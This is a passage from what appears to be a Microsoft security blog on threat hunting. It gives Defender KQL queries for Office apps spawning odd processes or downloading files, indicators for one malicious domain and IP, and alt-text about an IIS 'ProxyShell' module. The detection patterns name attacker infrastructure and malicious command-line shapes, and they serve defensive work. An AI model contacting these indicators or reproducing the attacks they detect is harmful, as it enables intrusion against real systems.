| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5
Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:
DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5
Query that searches for connections to malicious domains and IP addresses:
DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com"))
or (RemoteIP has_any ("198.54.115.248"))
Query that searches for files downloaded from malicious domains and IP addresses.
DeviceFileEvents
| where (FileOriginUrl has_any ("strainservice.com"))
or (FileOriginIP has_any ("198.54.115.248"))
Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName
Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName
Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex
@"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy
To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:
We are excited to announce that applications to attend BlueHat 2023 are now open! BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023. Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …
We are excited to announce that applications to attend BlueHat 2023 are now open! BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023. Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …
We are excited to announce that applications to attend BlueHat 2023 are now open We are excited to announce that applications to attend BlueHat 2023 are now open BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023.
: Security Analytics Platforms, Q4 2022
![A screenshot of events captured in the Microsoft IIS Configuration Operational log. Event ID 29 is highlighted to show the event logged when the IIS module ‘ProxyShell’ is added to the default website. The event text reads: Changes to ‘/system.webServer/modules/add[@name=”ProxyShell”]’ at ‘MACHINE/WEBROOT/APPHOST/Default Web Site’ have successfully been committed. The event details include the log name (Microsoft-IIS-Configuration/Operational), the source (IIS-Configuration), the level (Verbose), the User (omitted for this blog), the OpCode (Info), the logged timestamp (31/7/2022 11:40:16 AM), and the Computer (home).](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Fig-6-1024x943.png)
![A screenshot of events captured in the Microsoft IIS Configuration Operational log. Event ID 29 is highlighted to show the event logged when the IIS module ‘ProxyShell’ is removed from the default website. The event text reads: Changes to ‘/system.webServer/modules/remove[@name=”ProxyShell”]’ at ‘MACHINE/WEBROOT/APPHOST/Default Web Site’ have successfully been committed. The event details include the log name (Microsoft-IIS-Configuration/Operational), the source (IIS-Configuration), the level (Verbose), the User (omitted for this blog), the OpCode (Info), the logged timestamp (31/7/2022 11:41:52 AM), and the Computer (home).](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Fig-7_-1024x930.png)
